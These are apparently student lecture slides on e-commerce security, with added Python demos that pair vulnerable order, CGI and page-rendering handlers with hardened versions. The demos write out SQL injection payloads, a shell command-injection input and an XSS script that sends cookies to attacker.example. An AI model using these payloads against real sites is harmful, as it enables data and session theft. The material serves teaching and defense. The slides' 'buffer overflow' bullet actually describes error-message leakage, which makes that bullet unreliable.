E-Commerce Security

Internet and Web Development

Aug 7, 2012

Eric Pozzobon, Justin Peszleny, Sumeet Gill

What Is eCommerce

- Exchanging goods and services over the internet
- All major retail brands have an online presence: banks, industry, retail, and so on
- Some brands do not even have a physical presence
- Can be business-to-business (B2B) or business-to-consumer (B2C)

[Figure: common WebSphere Commerce business model]

Timeline

- 1979: Michael Aldrich invents online shopping (teleshopping)
- 1984: CompuServe launches the "Electronic Mall", the first advanced eCommerce service
- 1994: The first online bank opens
- 1995: Amazon.com launches
- 2000: The dot-com bust
- 2011: US eCommerce and online retail sales projected to reach $197 billion

Security

Three main concepts:

- Confidentiality: only authorized parties can read protected information
- Integrity: data is not altered, accidentally or maliciously, between sender and receiver
- Availability: authorized users can reach the resources that are rightfully theirs when they need them

Two perspectives:

- Development: the security features built into the system (encryption, password policies)
- Consumer: protection against attacks on the client side (firewalls, passwords)

Security Features

Basic categories of security features:

- Authentication: verifies who you are (e.g. a guest cannot log in as admin)
- Authorization: what you are allowed to do with your information (e.g. a customer cannot increase their own bank balance from their computer)
- Encryption: information is transformed so that it is unreadable to anyone who does not hold the key
- Auditing: keeping a record of the transactions that occur, so that they can be reviewed later

Involved Parties

- Shopper: purchaser of online goods or services
- Web site: seller of online goods or services
- Software vendor: creates and maintains the website and other business solutions
- Hacker: attempts illegitimate gains by exploiting the system

Why eCrime

Many benefits over traditional crime:

- Cheaper to carry out
- Resources more readily available
- Generally higher payoff (imagine stealing 10 cents from every account at one major bank)
- Broader range of targets
- Less chance of being witnessed
- Differences between national laws can be exploited
- Less potential to leave a trail

Attack Points

- Shopper
- Shopper's computer
- Network connection
- Server
- Rogue software

Types of Attacks

Tricking the shopper:

- Generally the easiest form of attack
- The attacker gathers information from websites and from the customers themselves
- Answers to common password-recovery questions are easy to research and are reused across sites, so one answer compromises this site and the shopper's accounts elsewhere
- Phishing schemes rely on look-alike domains and typos to harvest sensitive information (e.g. ibm.com/shop vs. ibn.com/shop)

Scanning computers:

- New computer and internet users have only vague security knowledge
- An attacker can scan exposed computers for sensitive information
- Port scans detect vulnerable services
- A user who disables the firewall to resolve a conflict is left with inadequate firewall protection


Types of Attacks (cont.)

Sniffing the network:

- Captures incoming and outgoing transactions and searches them for information (credentials, card numbers)
- Most practical at points of the network the attacker can reach: shared or public networks and unencrypted links

[Figure: sniffing the network]

Types of Attacks (cont.)

Denial of Service:

- Floods the server with useless requests
- Renders the server incapable of performing any other task
- Attackers can take over other machines as "slaves" (a botnet) that send the requests and lock up the target server

[Figure: denial of service]

Types of Attacks (cont.)

SQL injection:

- The attacker enters a single quote into an input field; an unhandled SQL error reveals which database software is in use and how the query is built, and the attacker then crafts input that alters the query to read or modify data

Price manipulation:

- Some retailers carry the price in the URL or a hidden form field. The attacker changes the number to get a lower price, and the server charges the submitted amount without checking it against the catalog

Buffer overflow:

- Sending oversized input to a field crashes or errors the handler; the PHP error message leaks file paths and function names, and from that information the attacker locates the restricted "admin" folder
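The SQL-injection and price-manipulation flaws above, as an added example that is not code from the original slides: a tiny order handler with both bugs, beside the hardened version. The catalog rows, product ids, request parameters and attacker payloads are constructed for this demo, and sqlite3 stands in for the shop database.

```python
"""Added example, not code from the original slides: a tiny order handler
with the SQL-injection and price-manipulation flaws described above, beside
the hardened version. The catalog rows, product ids and request parameters
are constructed for this demo, and sqlite3 stands in for the shop database."""
import sqlite3


def make_db():
    """In-memory catalog with two constructed products (prices in cents)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id TEXT PRIMARY KEY, name TEXT, price_cents INTEGER)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)",
                   [("sku-100", "Headphones", 5999), ("sku-200", "Laptop", 129900)])
    db.commit()
    return db


def vulnerable_checkout(db, params):
    """Both flaws from the slide: the product id is concatenated into the SQL
    text, and the price is taken from the request instead of the catalog."""
    query = "SELECT name FROM products WHERE id = '" + params["id"] + "'"
    row = db.execute(query).fetchone()        # a stray quote raises OperationalError
    if row is None:
        raise ValueError("no such product")
    return {"name": row[0], "charged_cents": int(params["price"])}


def hardened_checkout(db, params):
    """Bound parameter for the id; the price comes from the catalog only."""
    row = db.execute("SELECT name, price_cents FROM products WHERE id = ?",
                     (params["id"],)).fetchone()
    if row is None:
        raise ValueError("no such product")
    return {"name": row[0], "charged_cents": row[1]}


# Constructed attacker inputs for the vulnerable handler.
PROBE = "'"                                        # recon: provoke an SQL error
BYPASS = "' OR '1'='1"                             # turn the WHERE clause always-true
SCHEMA_DUMP = "' UNION SELECT sql FROM sqlite_master WHERE type='table'--"  # read the schema


def probe_error(db):
    """The recon step on the slide: the error text identifies the backend."""
    try:
        vulnerable_checkout(db, {"id": PROBE, "price": "1"})
    except sqlite3.OperationalError as exc:
        return str(exc)
    return ""


if __name__ == "__main__":
    db = make_db()
    print("error leaked:", probe_error(db))
    print("bypass:", vulnerable_checkout(db, {"id": BYPASS, "price": "1"}))
    print("schema:", vulnerable_checkout(db, {"id": SCHEMA_DUMP, "price": "1"}))
    print("hardened:", hardened_checkout(db, {"id": "sku-200", "price": "1"}))
```

The hardened handler never interpolates request data into SQL text and ignores any client-supplied price, so the three payloads produce an SQL error, a wrong product, and a schema dump only against the vulnerable one.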


Types of Attacks (cont.)

Cross-site scripting:

- The attacker injects a script into a page so that it runs in other users' browsers and steals their cookies, which carry their session information
- A pop-up redirects the user to the attacker's website, which is skinned to look like a common site (e.g. a bank's)

Remote command execution:

- Unvalidated input reaching CGI scripts that call operating-system commands lets the attacker execute arbitrary commands on the server

Weak authentication/authorization:

- Login details or other highly sensitive data can be intercepted if the page does not use HTTPS or other encryption
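The remote-command-execution and cross-site-scripting bugs on this slide share one root cause: untrusted input pasted into text that another interpreter (the shell, the browser) will parse. The following is an added example, not code from the original slides, showing each vulnerable handler next to its hardened form; the `name` parameter, the review text and the session id are constructed for the demo.

```python
"""Added example, not code from the original slides: a CGI-style handler
with a command injection and a page template with an XSS, each beside the
hardened version. Inputs (the name parameter, the review text, the session
id) are constructed for the demo."""
import html
import re
import subprocess

# ---- Remote command execution in a CGI-style handler ----------------------

def greet_vulnerable(name):
    """Builds a shell command line from the query parameter. A name such as
    'bob; id' makes the shell run 'id' on the server after the echo."""
    out = subprocess.run("echo Hello " + name, shell=True,
                         capture_output=True, text=True)
    return out.stdout.strip()


def greet_argv(name):
    """Same command with no shell: the name is one argv element, so shell
    metacharacters inside it are plain data."""
    out = subprocess.run(["echo", "Hello", name], capture_output=True, text=True)
    return out.stdout.strip()


NAME_RE = re.compile(r"[A-Za-z][A-Za-z0-9 ._-]{0,39}")   # constructed allow-list

def greet_hardened(name):
    """Defence in depth: allow-list the input, then call without a shell."""
    if not NAME_RE.fullmatch(name):
        raise ValueError("invalid name")
    return greet_argv(name)

# ---- Cross-site scripting --------------------------------------------------

def render_review_vulnerable(review):
    """Copies the review into the page verbatim, so a <script> in it runs in
    every visitor's browser and can read document.cookie."""
    return '<p class="review">' + review + "</p>"


def render_review_hardened(review):
    """Escape on output: the browser displays the text instead of running it."""
    return '<p class="review">' + html.escape(review, quote=True) + "</p>"


def session_cookie_header(session_id):
    """Second line of defence against cookie theft: HttpOnly keeps the cookie
    out of document.cookie and Secure keeps it off plain HTTP."""
    return "Set-Cookie: session=%s; HttpOnly; Secure; SameSite=Lax; Path=/" % session_id


if __name__ == "__main__":
    payload = "bob; echo PWNED"
    print(greet_vulnerable(payload))   # second line PWNED: the injected command ran
    print(greet_argv(payload))         # Hello bob; echo PWNED: treated as data
    review = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"
    print(render_review_vulnerable(review))
    print(render_review_hardened(review))
    print(session_cookie_header("abc123"))
```

The argv form alone already defeats the shell injection; the allow-list is kept because the downstream command may still misinterpret odd input (leading dashes, for instance). On the XSS side, escaping is the fix and the cookie flags only limit the damage when escaping is missed somewhere.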


Defenses

- Education
- Firewalls
- Secure Sockets Layer (SSL), today TLS
- Password policies
- Threat models
- Security audits

Types of Defense

Education:

- Make the consumer aware of security risks and how to avoid them

Personal firewall:

- Limits the types and amount of traffic allowed on your computer

Security audits:

- Manual (non-automated) review of the transactions recorded on the server to check for breaches


Types of Defense (cont.)

Server firewalls:

- Allow only expected traffic through to the application for processing
- "Honeypots" are used to trap attacks and exploits and store information about them for law enforcement

[Figure: server firewalls]

Types of Defense (cont.)

Threat models:

- Allow people to see potential weak links in security
- Drive revisions to the software and network design

[Figure: threat models]

Types of Defense (cont.)

Password policies

  Policy                                          Value
  Account lockout threshold                       6 attempts
  Consecutive unsuccessful login delay            10 seconds
  Matching user ID and password                   N (no, they cannot match)
  Maximum occurrence of consecutive characters    3 characters
  Maximum instances of any character              4 instances
  Maximum lifetime of passwords                   180 days
  Minimum number of alphabetic characters         1 alphabetic character
  Minimum number of numeric characters            1 numeric character
  Minimum length of password                      6 characters
  Reuse user's previous password                  N (no, cannot be reused)
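The policy table above turned into a checker, as an added example that is not code from the original slides. Two readings of the table are assumptions: "consecutive characters" is taken to mean a run of the same character repeated, and the user-ID comparison is case-insensitive. The lockout and delay rows are modelled with an injectable clock so they can be exercised without waiting.

```python
"""Added example, not code from the original slides: a checker for the
password policy table above, with the lockout and delay rules. Two readings
are assumptions: "consecutive characters" is taken as a run of the same
character repeated, and the user-id comparison is case-insensitive."""
import time

POLICY = {
    "lockout_threshold": 6,     # failed attempts before the account locks
    "failure_delay_s": 10,      # wait imposed after each consecutive failure
    "max_consecutive": 3,       # longest allowed run of one repeated character (assumption)
    "max_instances": 4,         # most times any single character may appear
    "max_age_days": 180,
    "min_alpha": 1,
    "min_digits": 1,
    "min_length": 6,
}


def longest_run(s):
    """Length of the longest run of one character repeated back to back."""
    best = run = 0
    prev = None
    for ch in s:
        run = run + 1 if ch == prev else 1
        best = max(best, run)
        prev = ch
    return best


def check_password(user_id, password, previous_passwords=()):
    """Return the list of violated rules; an empty list means accepted."""
    problems = []
    if len(password) < POLICY["min_length"]:
        problems.append("shorter than %d characters" % POLICY["min_length"])
    if sum(c.isalpha() for c in password) < POLICY["min_alpha"]:
        problems.append("needs an alphabetic character")
    if sum(c.isdigit() for c in password) < POLICY["min_digits"]:
        problems.append("needs a numeric character")
    if longest_run(password) > POLICY["max_consecutive"]:
        problems.append("more than %d consecutive identical characters" % POLICY["max_consecutive"])
    if password and max(password.count(c) for c in set(password)) > POLICY["max_instances"]:
        problems.append("a character appears more than %d times" % POLICY["max_instances"])
    if password.lower() == user_id.lower():
        problems.append("matches the user id")
    if password in previous_passwords:
        problems.append("reuses a previous password")
    return problems


def password_expired(changed_at, now):
    """Maximum password lifetime; both arguments are UNIX timestamps."""
    return now - changed_at > POLICY["max_age_days"] * 86400


class LoginThrottle:
    """Account lockout after 6 failures and a 10 s delay after each failure.
    The clock is injectable so the behaviour can be tested without sleeping."""

    def __init__(self, clock=time.time):
        self.clock = clock
        self.failures = {}      # user id -> (consecutive failures, time of last failure)

    def can_attempt(self, user_id):
        count, last = self.failures.get(user_id, (0, 0.0))
        if count >= POLICY["lockout_threshold"]:
            return False, "account locked"
        if count and self.clock() - last < POLICY["failure_delay_s"]:
            return False, "retry after %d s" % POLICY["failure_delay_s"]
        return True, ""

    def record(self, user_id, success):
        if success:
            self.failures.pop(user_id, None)
            return
        count, _ = self.failures.get(user_id, (0, 0.0))
        self.failures[user_id] = (count + 1, self.clock())


if __name__ == "__main__":
    print(check_password("alice", "alice"))       # several violations
    print(check_password("alice", "Summer2012"))  # [] (accepted)
    throttle = LoginThrottle()
    for _ in range(6):
        throttle.record("bob", False)
    print(throttle.can_attempt("bob"))            # (False, 'account locked')
```

The table reflects 2012-era practice. Current guidance in NIST SP 800-63B drops routine password expiry and composition rules in favour of minimum length, screening against breached-password lists and rate limiting, so of the rows above the lockout and delay rules are the ones that have aged best.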

Security Companies

ESET:

- NOD32 is a unified anti-threat system which protects against viruses, spyware, adware, trojans, worms and phishing attacks

F-Secure:

- Protects consumers and businesses against computer viruses and other threats, and also extends across mobile networks
- Global market leader in mobile phone protection

Fortify Software:

- Has created software that enables organizations to find, track and fix security vulnerabilities in their software applications
- Works with existing development and audit tools and processes, which can reduce the time it takes to identify and remediate security flaws

Juniper Networks:

- SSL VPN (Secure Sockets Layer virtual private network) is a single-platform security solution for small and large businesses
- Designed to support organizations that need to provide access for remote and mobile employees, partners and customers


Resources

- http://www.ibm.com/developerworks/websphere/library/techarticles/0504_mckegney/0504_mckegney.html
- http://en.wikipedia.org/wiki/Electronic_commerce
- http://www.symantec.com/connect/articles/common-security-vulnerabilities-e-commerce-systems
- http://www.applicure.com/solutions/ecommerce-security
- http://www.ecommercetimes.com/story/52323.html